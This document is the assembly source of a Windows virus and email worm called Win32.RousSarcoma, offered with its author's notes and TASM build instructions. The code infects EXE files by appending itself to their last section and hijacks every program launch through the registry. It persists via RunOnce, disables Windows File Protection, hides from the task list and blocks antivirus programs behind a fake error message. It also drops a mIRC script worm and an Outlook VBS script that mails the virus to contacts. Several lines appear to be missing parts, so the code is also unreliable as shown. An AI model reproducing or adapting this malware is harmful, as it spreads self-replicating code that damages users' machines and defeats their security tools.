Source Email Worm - win32.Rous.A

RousSarc.
asm
;
;
; .--------------------------------.
; | |
; | Win32.RousSarcoma by SnakeByte |
; | SnakeByte@kryptocrew.de |
; | www.kryptocrew.de/snakebyte |
; .__________________________________.
;
;
; This virus was created by the idea of coding a retro virus, which
; is able too fool with some AV's. I was not able to realize all my ideas,
; but I think it is some fun. This virus uses some tricks to make disinfection
; harder. I came to the idea of making a virus which is able to drop itself to
; the original EXE File, when I saw that most AV's do not detect the first
; generation of a lot of viruses. Therefore the one part of this virus stays
; undetected by heuristics. Generally this virus consits of 2 parts. The EXE File
; Part and the one which is executed with an infected file. It "hooks" the execution
; of every EXE File and does not execute it if it is an AV. If it is none, it gets
; infected and started. Before starting the file it also checks if there is an
; mirc.ini in the same path. If there is one, it drops a mirc script worm. In Addition
; to this, the virus install itself in the registry to get started every time with ;windows.
; It searches the registry for more paths to infect files there. If it can't find more
; paths it drops a vbs script to send the worm around via Outlook.
;
; I am not good at writing so here is an overview of what
; the virus does :
;
;
; Name : Win32.RousSarcoma
; Type : PE-Appender by increasing last section
; Worming : Yes, mIRC Script and VBS Worm
; Operating System : Win32
; Author : SnakeByte
; Payload : None, too boring to write one ;) [ Got some other interesting ;stuff
; in mind i want to code as soon as possible ]
; Virus Size : 8192 Bytes
; Infection Mark : A-AV
; Encryption : None
; Autostart : RunOnce & exefiles
; Anti-Bait : Does not infect files < 20000 Bytes
; Anti-Debugging : Yes, against SoftIce and Int 1h tracing
; Anti-AV : Yes, does not allow the execution of several AV's
; disables Win2k File Protection
; Anti-User : Hides itself in files & several different places,
; is not shown at ctrl-alt-del list
; Runs at Level : Ring-3, but still infects every EXE File on executing
; Infects : 10 Files in the current directory,
; 10 Files in every path stored in this registry Key :
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App ;Paths
; Every EXE File which gets executed
;
; How to compile ( TASM 5.0 ) :
;
; tasm32 /z /ml /m3 RousSarc,,;
; tlink32 -Tpe -c RousSarc,RousSarc,, import32.lib
; pewrsec RousSarc.EXE
;
; ( Make sure that the .EXE is uppercases !! )
;
; At the moment there are just 100 Bytes of Code i could add, with the file staying
; at 8192 Bytes. If I would add more, the file would grow to 12 KB. I decided to
RousSarc.asm
; keep it small and leave stuff out like encryption or even poly. Maybe it could
; be optimized on several parts to make it fit with encryption to a 8 KB file,
; but I don't mind at the moment
;
;
;
; Thanks and greetz to :
;
; Lord Arz : Did you also finish your EXEFILES "hooking" something ? ;)
; DukeCS : Heh, when will KC be done ? *fg*
; Matsad : Sorry, for not coming, but i got no cash and need to see my girlfriend ;:P
; Lethal Mind : Heh, where are you ? ;(
; Ciatrix : Nice that you carry on !
;
;
;
; ***************************************************************************
; ------------------------[ Let's get ready to rumble ]----------------------
; ***************************************************************************
.586p
.model flat
jumps ; calculate Jumps
.radix 16 ; Hexadecimal numbers
; define some API's

extrn ExitProcess:PROC ; Host for EXE-Part
extrn LoadLibraryA:PROC ; nessesairy to get all other API's in the EXE-Part
extrn GetProcAddress:PROC ; cause I don't want DLL not found error's
extrn MessageBoxA:PROC ; for testing
.code
; Some constants
VirusSize equ 8192d ; Lenght of EXE-File
ImageBase equ 400000h ; Imagebase of our TASM generated EXE-File
CPart1 equ 600h

Gap1 equ 0A00h
; ###########################################################################
; -------------------[ This is the first part of the virus ]-----------------
; ###########################################################################
Virus:
; Here do we search for EXE-files and put the
; entire PE-Virus EXE to the end !
; we search for the needed api's with GetProcAdress
; and LoadModuleHandle, so we will not get Problems
; with missing DLL's or API's
mov ebp, 'VA-A' ; place a mark in ebp, to identify this part
lea eax, KERNEL32 ; push name of kernel32.dll

push eax
call LoadLibraryA ; save Handle
mov dword ptr [K32Handle], eax
test eax, eax ; if we failed we stop here
jz FirstGenHost
lea esi, Kernel32Names ; get all API's we need from kernel

lea edi, XFindFirstFileA
mov ebx, K32Handle
RousSarc.asm
push NumberOfKernel32APIS
pop ecx
call GetAPI3 ; the procedure is needed in both parts
lea eax, advname ; push name of advapi32.dll

push eax
call LoadLibraryA ; save Handle
mov dword ptr [ADVHandle], eax
test eax, eax ; if we failed we stop here
jz FirstGenHost
lea esi, AdvapiNames ; get all API's we need from kernel

lea edi, XRegOpenKeyExA
mov ebx, ADVHandle
push NumberOfAdvapiAPIS
pop ecx
call GetAPI3 ; the procedure is needed in both parts
; Lets hide our Application from the CTRL-ALT-DEL List,

; to prevent us from being detected by a suspicious user ;)
; Check if the API is available

cmp dword ptr [XRegisterServiceProcess],0
je NoHide
; Get ID of our process

call dword ptr [XGetCurrentProcessId]
push 1 ; We want to run as a service

push eax ; process id
call dword ptr [XRegisterServiceProcess]
NoHide:
; ***************************************************************************
; ---------------------------[ Initialisation ]------------------------------
; ***************************************************************************
; Lets do a check on our commandline params,
; to see, if we got startet with a filename
; in it --> exefile method
call dword ptr [XGetCommandLineA]

mov dword ptr [CmdLine], eax
; the start of the commandline is in eax,

; we will parse it to the .exe part to see
; if there is anything afterwards
CommandReceive1:
cmp dword ptr [eax],'EXE.'
je CommandOK1
inc eax
jmp CommandReceive1
CommandOK1:
add eax, 4h ; eax points directly after the <name>.exe
cmp byte ptr [eax], 0 ; if the Commandline ends here, we do not need
je SetRunOnceKey ; to care about this ;)
add eax, 2h ; skip blanc and "

mov esi, eax ; save it
mov dword ptr [SaveBlanc], esi
RousSarc.asm
push esi
call AVNameCheck
cmp esi, 0
je AVMessage
pop esi
jmp mIRCcheck
AVMessage: ; Arg ! Dirty AV found .. :P

pop esi ; lets drop a message
push 30h ; Style

push esi
push offset AVMsg
push 0
call MessageBoxA
jmp SetRunOnceKey
AVMsg db "File is corrupted. Can't start program",0
PathEnd dd 0h
mIRCcheck: ; we search for the path

pushad
push offset PathEnd

push offset NameBuffer
push 255d
push dword ptr [SaveBlanc]
call dword ptr [XGetFullPathNameA]
mov edi, dword ptr [PathEnd]

mov esi, offset mircINI ; append the mirc.ini to the path
mov ecx, 9d
rep movsb ; and now we need to check if the mIRC.ini does exist
; if it does, we found a mirc script to infect *eg*
; because we infect it bevore mIRC gets loaded, we do not
; need to fear the mIRC worm protection
lea esi, NameBuffer
call FindFirstFileProc
cmp eax, -1 ; we did not found the mirc.ini ;(
je NoMirc
push offset NameBuffer ; Write our entry to the file

push offset MIRCprot
push offset MOffset
push offset MIRCrfiles
call dword ptr [XWritePrivateProfileStringA]
mov edi, dword ptr [PathEnd]

mov esi, offset MIRCprot ; append the RousSarc.ini to the path
mov ecx, 13d
rep movsb ; and now we need to check if the mIRC.ini does exist
push 0
push 080h ; normal attribs
push 2h ; create a new file (always)
push 0
push 0
push 0C0000000h ; read + write
lea eax, NameBuffer ; file we create
RousSarc.asm
push eax
Call dword ptr [XCreateFileA]
cmp eax, 0FFFFFFFFh
je NoMirc
push eax ; save filehandle
push 0 ; write script to file

push offset Write
push offset EndScript - offset MIRCscript
push offset MIRCscript
push Handle
call dword ptr [XWriteFile]
; Handle is still on the stack, so we close the file

call dword ptr [XCloseHandle]
NoMirc:
; close the search handle
push dword ptr [FindHandle]
popad
CommandReceive2: ; so we will be able to locate the file and

cmp byte ptr [eax],'.' ; infect it
je CommandOK2
cmp byte ptr [eax],0 ; check if we don't get too far
je Outbreak
inc eax
jmp CommandReceive2
CommandOK2:
add eax, 4h
cmp byte ptr [eax],0
jne ZeroAfterName
mov byte ptr [eax+1],0
ZeroAfterName:
mov byte ptr [eax],0 ; we place a Zero here, so we can do a findfirst
; on the filename which is in esi
push eax
push esi
pop esi ; esi points to start of filename
pop ebx ; ebx points to the parameters
cmp eax, -1 ; file is not there :(

je Outbreak ; we infect some others
pushad ; save registers

lea edi, WFD_szFileName
mov ecx, ebx ; lenght of filename in ecx
sub ecx, esi
inc ecx
rep movsb ; write filename & path there
lea esi, WFD_szFileName ; point to filename

call InfectFile ; infect file
popad ; restore registers
; esi points to start of filename

RousSarc.asm
; ebx points to the parameters

mov byte ptr [ebx], " " ; place a blank here
xor eax, eax ; let's execute the file

push offset ProcessInformation
push offset StartupInfo
push eax ; lpCurrentDirectory
push eax ; lpEnvironment
push eax ; Create_New_Process_Group & Normal_Priority_Class
push eax ; bInheritHandles
push eax ; lpThreadAttributes
push eax ; lpProcessAttributes
push esi ; filename with commandline
push eax ; command line
call dword ptr [XCreateProcessA]
SetRunOnceKey: ; Here we go if we found an AV or got

; or after executing a program
; lets add 2 autostart features
; Now we store the name of this file in the RunOnce key

; ( we add our file that regulary, that it will be always there,
; but nearly noone looks for files in this key *g* )
push offset RegHandle
push 001F0000h ; complete access
push 0h ; reserved
push offset RunOnceKey ; check if our key exists
push HKEY_LOCAL_MACHINE ; HKEY_LOCAL_MACHINE
call dword ptr [XRegOpenKeyExA]
cmp eax, 0
jne CheckOwnKey
xor eax, eax ; search for end of Systemdirectory

lea edi, NameBuffer
mov ebx, edi
repnz scasb
sub ebx, edi
inc ebx
push ebx
push offset NameBuffer ; Value
push 1h ; String
push 0 ; reserved
push offset Valuename ; value name
push dword ptr [RegHandle]
call dword ptr [XRegSetValueExA]

call dword ptr [XRegCloseKey]
jmp FirstGenHost
SaveBlanc dd 0h
EXEFilesKey db 'exefile\shell\open\command',0
EXEFilesValue db 'RousSarc.EXE "%1" %*',0
EFVSize equ $ - offset EXEFilesValue
; ***************************************************************************
; ------------------------------[ Outbreak ! ]-------------------------------
RousSarc.asm
; ***************************************************************************
Outbreak: ; We got no commandline !
HKEY_CURRENT_USER equ 80000001h
HKEY_LOCAL_MACHINE equ 80000002h
; first of all, let's disable the win2k virus protection

push 0h ; reserved
push offset _2kProt ; check if our key exists
test eax, eax ; if we failed opening the key, we return

jz No2kProt
; Value to disable Windows File Protection

mov dword ptr [RegBuffer], 0ffffff9dh
push 4
push offset RegBuffer ; Value
push 4h ; REG_DWORD
push 0 ; reserved
push offset _2kProtValue ; value name
; Close it again
No2kProt: ; Now we will copy ourselfes into the windows directory

; to be able to respond to every started file
; we just got the cmd line
mov eax, dword ptr [CmdLine]
CommandReceive3:
je CommandOK3
inc eax
jmp CommandReceive3
CommandOK3:
add eax, 4h ; eax points directly after the <name>.exe
mov byte ptr [eax], 0 ; Place a 0 here to copy the file
push 255d
call dword ptr [XGetWindowsDirectoryA]
xor eax, eax ; search for end of Systemdirectory

lea edi, NameBuffer
repnz scasb
dec edi
lea esi, RunOnceName ; Append Filename
mov ecx, 13d
rep movsb
; Copy our file to the system directory

push 1
push offset NameBuffer ; where to store
push dword ptr [CmdLine] ; existing
RousSarc.asm
call dword ptr [XCopyFileA]
; Lets set the Exefiles Key

push 0h ; reserved
push offset EXEFilesKey ; Open It
push 80000000h ; HKEY_CLASSES_ROOT
cmp eax, 0
jne CheckOwnKey
; Let's set our Value

push EFVSize
push offset EXEFilesValue ; Value
push 1h ; String
push 0h ; reserved
push 0h ; value name

CheckOwnKey:
mov dword ptr [RegBuffer], 0h

push 0h ; reserved
push offset MyKey ; check if our key exists
push HKEY_CURRENT_USER ; HKEY_CURRENT_USER
test eax, eax ; if we failed opening the key, we return

jz KeySet
xor eax, eax ; clear eax

push offset Dispostiton
push eax ; security attribs
push eax ; REG_OPTION_NON_VOLATILE
push eax ; lpClass
push eax ; reserved
push offset MyKey ; Subkey
push HKEY_CURRENT_USER ; HKEY_CURRENT_USER
call dword ptr [XRegCreateKeyExA]
KeySet:
push offset RegData2

push offset RegBuffer
push 0
push offset Valuename
call dword ptr [XRegQueryValueExA]
; RegBuffer contains now a value after which
RousSarc.asm
; we decide what to do, but first, we increment the

; value and save it
inc dword ptr [RegBuffer] ; Increment Value
push 4
push offset RegBuffer ; Value
push 4h ; REG_DWORD
push 0 ; reserved
push offset Valuename ; value name
; Close the key

mov eax, dword ptr [RegBuffer]
; Now we decide what to do ( we start with 2 because we just incremented it and i will not
do anything after
; the second start, cause we need one reboot to disable WFP ) :
;
; Value - what to do
;
; 2 - infect directory 1 of
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
; 3 - " " 2 " ""
; 4 - " " 3 " ""
; 5 - " " 4 " ""
; 6 - " " 5 " ""
; ... no more directorys in RegKey ? --> set value to 0
dec eax
dec eax
jz NoRegistryInfection
push eax

push 0h ; reserved
push offset AppPaths ; App Paths are stored here
pop eax
push 255d
push eax ; Key Number we want to retrieve
call dword ptr [XRegEnumKeyA]
cmp eax, 0
jne DropVBSWorm
push offset RegHandle2

push 0h ; reserved
push offset NameBuffer ; App Paths are stored here
push dword ptr [RegHandle] ; HKEY_LOCAL_MACHINE
RousSarc.asm
; Read Vakze
mov dword ptr [RegData2], 255d

push 0
push offset PathValue
push dword ptr [RegHandle2]
call dword ptr [XRegQueryValueExA]
push dword ptr [RegHandle2]

lea edi, NameBuffer ; Remove ; to get directory

mov al, ';'
mov ecx, 254d
repnz scasb
dec edi
mov byte ptr [edi], 0
push offset CurrentPath ; Get Current dir and save it

push 255d
call dword ptr [XGetCurrentDirectoryA]
push offset NameBuffer ; set new directory

call dword ptr [XSetCurrentDirectoryA]
call InfectCurDir ; Infect the directory
push offset CurrentPath ; restore old directory

call dword ptr [XSetCurrentDirectoryA]
CloseRegInfection:
NoRegistryInfection:
call InfectCurDir ; Infect the current directory

jmp FirstGenHost
DropVBSWorm: ; Ok, we found no more directorys in the App Paths

; Registry Key, so we will drop a little VBS Script
; and execute it, so the virus will also spread with
; the help of outlook
push 0
push 080h ; normal attribs
push 2h ; create a new file (always)
push 0
push 0
push 0C0000000h ; read + write
lea eax, VBSWorm
push eax
Call dword ptr [XCreateFileA]
cmp eax, 0FFFFFFFFh
je CloseRegInfection
RousSarc.asm
push eax ; save filehandle
push 0 ; write script to file

push offset Write
push offset EndVBSScript - offset VBSscript
push offset VBSscript
push Handle
call dword ptr [XWriteFile]
; Handle is still on the stack, so we close the file

xor eax, eax ; let's execute the wormy script

push offset ProcessInformation
push offset StartupInfo
push offset VBSWorm ; filename with commandline
jmp CloseRegInfection
VBSscript:
db 'On Error Resume Next', 13d, 10d
db 'Dim R', 13d, 10d
db 'Set RS=CreateObject("Outlook.Application")', 13d, 10d
db 'For R=1 To 500', 13d, 10d
db 'Set Mail=RS.CreateItem(0)', 13d, 10d
db 'Mail.to=RS.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)', 13d, 10d
db 'Mail.Subject="Funny Thing !"', 13d, 10d
db 'Mail.Body="Take a look at this and just start laughing !"', 13d, 10d
db 'Mail.Attachments.Add("C:\RousSarc.EXE")', 13d, 10d
db 'Mail.Send', 13d, 10d
db 'Next', 13d, 10d
db 'RS.Quit', 13d, 10d, 13d, 10d
EndVBSScript:
VBSWorm db 'C:\RousSarc.vbs',0
AppPaths db 'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths',0

PathValue db 'Path',0
RegData2 dd 4h ; Bytes to read in Buffer

RegBuffer dd 0h ; Buffer
Valuename db 'RousSarcoma',0
MyKey db 'RousSarcoma',0
RegHandle2 dd 0h
; ***************************************************************************
; --------------------------[ Infection current dir ]------------------------
; ***************************************************************************
RousSarc.asm
; We got all we need

; let's party ;)
InfectCurDir: ; Infect up to 10 files in the current directory
; use FindFirstFile / Next to find files
; 10 files at max.
mov dword ptr [InfCounter], 10d
lea esi, filemask

inc eax
jz EndInfectCurDir1 ; did we get all ?
dec eax
InfectCurDirFile:
; Filename in esi
lea esi, WFD_szFileName
call InfectFile ; Try it !
cmp dword ptr [InfCounter], 0h
jna EndInfectCurDir2
call FindNextFileProc
test eax, eax

jnz InfectCurDirFile
EndInfectCurDir2: ; close Search - Handle
push dword ptr [FindHandle]

call dword ptr [XFindClose]
EndInfectCurDir1:
ret
; ***************************************************************************
; -------------------------[ prepare Infection ]----------------------------
; ***************************************************************************
InfectFile: ; filename is in WFD_szFileName

; esi shows to this value
call AVNameCheck
cmp esi, 0h
je NoInfection
lea esi, WFD_szFileName
; ignore files smaller than 20000 Bytes

cmp dword ptr [WFD_nFileSizeLow], 20000d
jbe NoInfection
; ignore files bigger than 4,3 GB
cmp dword ptr [WFD_nFileSizeHigh], 0
jne NoInfection
call OpenFile ; Open File

jc NoInfection ; stop if there are problems
mov esi, eax
call CheckMZSign ; Check for DOS-Stub

RousSarc.asm
jc Notagoodfile
cmp word ptr [eax+3Ch], 0h

je Notagoodfile
xor esi, esi ; get PE-Header

mov esi, [eax+3Ch]
; Check if file is corrupted
cmp dword ptr [WFD_nFileSizeLow], esi
jb Notagoodfile
add esi, eax

mov edi, esi
call CheckPESign ; Check for PE-Header
jc Notagoodfile
; Check Infection Mark
; --> A-AV ( Anti- Anti-Virus )
cmp dword ptr [esi+4Ch], 'VA-A'

jz Notagoodfile
mov bx, word ptr [esi+16h]; Get Characteristics

and bx, 0F000h ; select Dll-Flag
cmp bx, 02000h
je Notagoodfile ; we won't no DLL Files
mov bx, word ptr [esi+16h]; Check for DLL-Files

and bx, 00002h
cmp bx, 00002h
jne Notagoodfile
call InfectEXE ; Infect this sucker !

jc NoInfection
Notagoodfile:
call UnMapFile
NoInfection:
ret
; ***************************************************************************
; ------------------------------[ File-Handling ]----------------------------
; ***************************************************************************
; FileName needs to be in esi
OpenFile:
xor eax,eax ; Open Files
push eax
push eax
push 3h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi ; Filename is in ESI
call dword ptr [XCreateFileA]
inc eax
jz Closed
dec eax
mov dword ptr [FileHandle],eax

mov ecx, dword ptr [WFD_nFileSizeLow]
RousSarc.asm
CreateMap:
push ecx
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [FileHandle]
call dword ptr [XCreateFileMappingA]
mov dword ptr [MapHandle],eax
pop ecx ; Get Map-Site

test eax, eax
jz CloseFile ; Datei wieder...
xor eax,eax
push ecx
push eax
push eax
push 2h
push dword ptr [MapHandle]
call dword ptr [XMapViewOfFile]
or eax,eax
jz UnMapFile
; EAX contains starting offset of the map
mov dword ptr [MapAddress],eax
clc
ret
UnMapFile:
call UnMapFile2
CloseFile:
push dword ptr [FileHandle]
call [XCloseHandle]
Closed:
stc
ret
UnMapFile2:
push dword ptr [MapAddress]
call dword ptr [XUnmapViewOfFile]
push dword ptr [MapHandle]

ret
; ***************************************************************************
; ---------------------[ Infection of the EXE-File ]-------------------------
; ***************************************************************************
InfectEXE: ; MapAddress contains the start address of the file
mov ecx, [esi+3Ch] ; esi points to PE-Header

; ecx = Alignment Faktor
RousSarc.asm
mov eax, dword ptr [WFD_nFileSizeLow]

add eax, VirusSize
call Align
mov dword ptr [NewSize], eax
xchg ecx, eax
pushad
call UnMapFile2 ; remap file
popad
call CreateMap
jc NoEXE
; esi = PE-Header
mov esi, dword ptr [eax+3Ch]
add esi, eax

mov edi, esi ; edi = esi
; eax = Sections
; get last section
movzx eax, word ptr [edi+06h]
dec eax
imul eax, eax, 28h
add esi, eax
add esi, 78h ; point to Directory Table
mov edx, [edi+74h] ; Get Directory Entrys

shl edx, 3h
add esi, edx
; get EIP
mov eax, [edi+28h]
mov dword ptr [OldEIP], eax
; get Imagebase
mov eax, [edi+34h]
mov dword ptr [OldBase], eax
mov edx, [esi+10h] ; get size of RAW-Data

mov ebx, edx
add edx, [esi+14h] ; edx = points to raw-data
push edx
mov eax, ebx

add eax, [esi+0Ch] ; EAX contains now Start of our file
; but we need to point it to the second part of the virus
add eax, ( offset SecondPart - ImageBase ) - Gap1
; the 0A00h are caused by the uninitialized data
mov [edi+28h], eax

mov dword ptr [NewEIP], eax
mov eax, [esi+10h] ; enlarge Raw-Data

push eax
add eax, VirusSize ; VirusSize = Size of entire file
mov ecx, [edi+3Ch] ; align it
call Align
mov [esi+10h], eax ; save in file
pop eax ; new Virtual-Size

add eax, VirusSize
mov [esi+08h], eax
RousSarc.asm
pop edx
mov eax, [esi+10h]

add eax, [esi+0Ch] ; get new imagesize
mov [edi+50h], eax
; change the section flags
or dword ptr [esi+24h], 0A0000020h
; Write infection mark to file
; --> A-AV ( Anti- Anti-Virus )
mov dword ptr [edi+4Ch], 'VA-A'
xchg edi, edx
; save the start of the virus in file

mov dword ptr [StartofVirusinFile], edi
add edi, dword ptr [MapAddress]
push edi
call OpenMyself
; lets save the right Imagebase and EIP
; inside our buffered file ;)
; Save EIP & Imagebase

mov eax, dword ptr [OldEIP]
lea edi, FileBuffer
add edi, (offset retEIP - ImageBase) - Gap1
stosd
mov eax, dword ptr [OldBase]

lea edi, FileBuffer
add edi, (offset retBas - ImageBase) - Gap1
stosd
pop edi
lea esi, FileBuffer
mov ecx, VirusSize ; First Part
rep movsb ; append
; we need two steps, otherwise we would fill the
dec byte ptr [InfCounter]

clc
ret
NoEXE:
stc
ret
; ***************************************************************************
; -------------------------[ Open Us-Prozedur ]------------------------------
; ***************************************************************************
OpenMyself: ; this Procedure returns the start of
; the current file in esi
; first we need the filename
pushad
call dword ptr [XGetCommandLineA]
inc eax
mov dword ptr [CmdLine], eax
CommandReceive:
RousSarc.asm
je CommandOK
inc eax
jmp CommandReceive
CommandOK:
add eax, 4h
mov byte ptr [eax],0 ; CmdLine contains now a pointer
; to the filename of our file
mov esi, dword ptr [CmdLine]
xor eax,eax ; Open File

push eax
push eax
push 3h
push eax
inc eax
push eax
push 80000000h
push esi ; Filename is in ESI
call dword ptr [XCreateFileA]
mov ebx, eax ; save handle
push 0 ; load the file into the free memory

push offset Read ; number of bytes read..
push VirusSize ; read how many bytes ?
push offset FileBuffer
push eax
call dword ptr [XReadFile]
push ebx
popad
ret
Read dd ?
; ***************************************************************************
; -----------------------[ Check if we got an AV ]---------------------------
; ***************************************************************************
AVNameCheck: ; pointer to name is in esi
pushad ; save all registers
lea edi, NameBuffer ; we transfer the name to a buffer

xor ecx, ecx
NameCheckLoop:
cmp byte ptr [esi], 0 ; check if we are at the end
je NameTransferred
lodsb ; get first letter
cmp al, 96d
jb StoreLetter
sub al, 32d ; convert to uppercase
StoreLetter:
stosb
inc ecx
jmp NameCheckLoop
NameTransferred: ; nothing found .. :(

cmp ecx, 0
je EndNameCheck
RousSarc.asm
mov dword ptr [NameLen], ecx
mov edx, 28d ; Number of AV-Names we check

lea esi, AVNames ; Pointer to the names
lea ebp, AVLenght
CheckLoop:
call NameCheck ; Procedure to check this name
jc WeGotAvName ; if Carriage Flag is set we got one
dec edx ; otherwise we search on, until edx = 0
jz EndNameCheck
xor eax, eax

mov al, byte ptr [ebp] ; increase esi
mov esi, dword ptr [NameESI2]
add esi, eax
inc ebp
jmp CheckLoop
EndNameCheck: ; We found nothing :)

popad
ret
WeGotAvName: ; We found a dirty AV :(

popad
xor esi, esi ; ESI = 0 as flag
ret
NameCheck: ; ECX contains the size of the search area

; ESI points to av name
; EDI points to filename
mov dword ptr [NameESI2], esi
mov ecx, dword ptr [NameLen]
lea edi, NameBuffer ; here we search for the Name
mov al, byte ptr [esi] ; get first byte into al..
mov dword ptr [NameESI], esi ; avname

mov dword ptr [NameEDI], edi ; filename
SearchOn:
mov esi, dword ptr [NameESI] ; avname
mov edi, dword ptr [NameEDI]
repnz scasb ; start search

cmp ecx,0
jz NoAV
mov dword ptr [NameESI], esi

dec edi
mov dword ptr [NameEDI], edi
Compare: ; compare the rest of the string

xor ecx, ecx
mov cl, byte ptr [ebp] ; points to stringlenght
Compare2:
repz cmpsb
jc Compare2
cmp ecx,0
jz Found
NoAV:
ret
RousSarc.asm
Found: ; We got a dirty AV :P

stc ; set flag
ret
NameLen dd 0h ; Size of the filename

NameESI dd 0h ; Pointer to av name
NameEDI dd 0h ; Pointer to filename
NameESI2 dd 0h ; Pointer to av name
; Table with names of AV-File we don't start

AVNames:
db 'AVPM' ; AVP Names
db 'AVP32'
db 'AVPCC'
db 'AVPTC'
db '_AVPM'
db '_AVP32'
db '_AVPCC'
db 'AVPDOS'
db 'AVE32' ; Anti-Vir
db 'AVGCTRL'
db 'AVWIN95'
db 'SCAN32' ; DR-Solomon
db 'AVCONSOL'
db 'VSHWIN32'
db 'FP-WIN' ; F-Prot
db 'F-STOPW'
db 'DVP95' ; F-Secure
db 'F-AGNT95'
db 'F-PROT95'
db 'VET95' ; InnoculateIT
db 'VETTRAY'
db 'CLAW95' ; Norman Virus Control

db 'NVC95'
db 'NAVAPW32' ; Norton
db 'NAVW32'
db 'SWEEP95' ; Sophos
db 'IOMON98' ; PC-Cillin
db 'PCCWIN98'
db 'MONITOR' ; RAV
db 'RAW7WIN'
AVLenght:
db 4d, 5d, 5d, 5d, 5d, 6d, 6d, 6d ; AVP
db 5d, 7d, 7d ; ANTI-Vir
db 6d, 8d, 8d ; DR-Solomon
db 6d, 7d ; F-PROT
db 5d, 8d, 8d ; F-Secure
db 5d, 7d ; Innoculate-IT
db 6d, 5d ; Norman
db 8d, 6d ; Norton
db 7d ; Sophos
RousSarc.asm
db 7d, 8d ; PC-Cillin
db 7d, 7d ; RAV
; ***************************************************************************
; --------------------------[ Align-Prozedur ]-------------------------------
; ***************************************************************************
; eax - Size
; ecx - base
Align:
push edx
xor edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx ; eax - New Size
ret
; ***************************************************************************
; --------------------------[ FindFile Prozeduren ]--------------------------
; ***************************************************************************
; Search for files

FindFirstFileProc:
call ClearFindData
lea eax, WIN32_FIND_DATA
push eax
push esi
call dword ptr [XFindFirstFileA]
mov dword ptr [FindHandle], eax
ret
FindNextFileProc:
call ClearFindData
lea eax, WIN32_FIND_DATA
push eax
mov eax, dword ptr [FindHandle]
push eax
call dword ptr [XFindNextFileA]
ret
ClearFindData:
lea edi, WFD_szFileName
mov ecx, 276d ; clear old data
xor eax, eax
rep stosb
ret
;****************************************************************************
;-----------------------------[ PE / MZ Check ]------------------------------
;****************************************************************************
; Check MZ and PE - Signs
CheckPESign:
cmp dword ptr [edi], 'FP' ; greater or equal to "PF"
jae NoPESign
cmp dword ptr [edi], 'DP' ; lower or equal to "PD"

jbe NoPESign
clc ; all left is "PE"

RousSarc.asm
ret
NoPESign:
stc
ret
CheckMZSign:
cmp word ptr [esi], '[M'

jae NoPESign
cmp word ptr [esi], 'YM'

jbe NoPESign
clc
ret
ret
; ***************************************************************************
; ----------------[ This is the host for the EXE-Virus Part ]----------------
; ***************************************************************************
FirstGenHost:
push 0h ; stop this !
call ExitProcess
jmp FirstGenHost
;
; \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
; ////////////////////////////////////////////////////////////////////////////\
; ###########################################################################/\
; ------------------[ This is the second part of the Virus ]-----------------/\
; ###########################################################################/\
; ////////////////////////////////////////////////////////////////////////////\
; \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
;
SecondPart:
; Here do we drop the entire file from the
; infected goat and execute it
; ***************************************************************************
; -------------------------[ Search for Kernel ]-----------------------------
; ***************************************************************************
call Delta
Delta:
pop ebp
sub ebp, offset Delta
mov esi, [esp] ; get Create Process API

xor si, si
call GetKernel ; Search for kernel

jnc GetApis ; If we got it we carry on..
jmp ExecuteHost
RousSarc.asm
; ***************************************************************************
; --------------------[ Search-Kernel Procedure ]----------------------------
; ***************************************************************************
GetKernel:
mov byte ptr [ebp+K32Trys], 5h
GK1:
cmp byte ptr [ebp+K32Trys], 00h
jz NoKernel ; did we pass the limit ?
call CheckMZSign ; Check for exe-stub

jnc CheckPE
GK2:
sub esi, 10000h ; search next page
dec byte ptr [ebp+K32Trys]
jmp GK1 ; test again
CheckPE: ; test for PE-Header

mov edi, [esi+3Ch]
add edi, esi
call CheckPESign
jnc CheckDLL ; check dll-sign

jmp GK2
CheckDLL:
add edi, 16h
mov bx, word ptr [edi] ; get characteristics
and bx, 0F000h ; to check for dll flag
cmp bx, 02000h
jne GK2
KernelFound: ; We got it !
sub edi, 16h ; edi = PE-Header
xchg eax, edi ; eax = PE offset
xchg ebx, esi ; ebx = MZ offset
clc ; clear carriage flag
ret
NoKernel:
stc ; set carriage flag if we did not found it
ret
K32Trys db 5h ; search range
; ***************************************************************************
; ---------------------------[ Search for API's ]----------------------------
; ***************************************************************************
; we search for LoadLibaryA and GetProcAddress

; in the kernel to get the other API's
LL db 'LoadLibraryA', 0h
GPA db 'GetProcAddress', 0h
GetApis: ; offset of Kernel32.dll PE-headers in eax
mov [ebp+KernelAddy], eax ; save

RousSarc.asm
mov [ebp+MZAddy], ebx
lea edx, [ebp+LL] ; Point to LoadLibaryA - API

mov ecx, 0Ch ; size of name
call SearchAPI1 ; search it
mov [ebp+XLoadLibraryA], eax
; save offset
xchg eax, ecx ; if we did not get it, we can't go on

jecxz ExecuteHost
lea edx, [ebp+GPA] ; Name of GetProcAddress - API

mov ecx, 0Eh ; size
call SearchAPI1
mov [ebp+XGetProcAddress], eax
xchg eax, ecx ; check if we got it

jecxz ExecuteHost
GetAPI2: ; locate all other apis now

lea eax, [ebp+KERNEL32]
push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+K32Handle], eax
test eax, eax
jz ExecuteHost
lea esi, [ebp+Kernel32Names2]

lea edi, [ebp+YCreateFileA]
mov ebx, [ebp+K32Handle]
push NumberOf2Kernel32APIS
pop ecx
call GetAPI3
jmp DropIT ; let's do something serious ;)
; ***************************************************************************
; --------[ Search the kernel export table for the 2 main API's ]------------
; ***************************************************************************
SearchAPI1:
and word ptr [ebp+counter], 0h
mov eax, [ebp+KernelAddy] ; get PE-Header offset
mov esi, [eax+78h] ; get Export Table Address

add esi, [ebp+MZAddy]
add esi, 1Ch
lodsd ; get address table

add eax, [ebp+MZAddy]
mov dword ptr [ebp+ATableVA], eax
lodsd ; get pointer table

mov dword ptr [ebp+NTableVA], eax
lodsd ; Ordinal Table

mov dword ptr [ebp+OTableVA], eax
RousSarc.asm
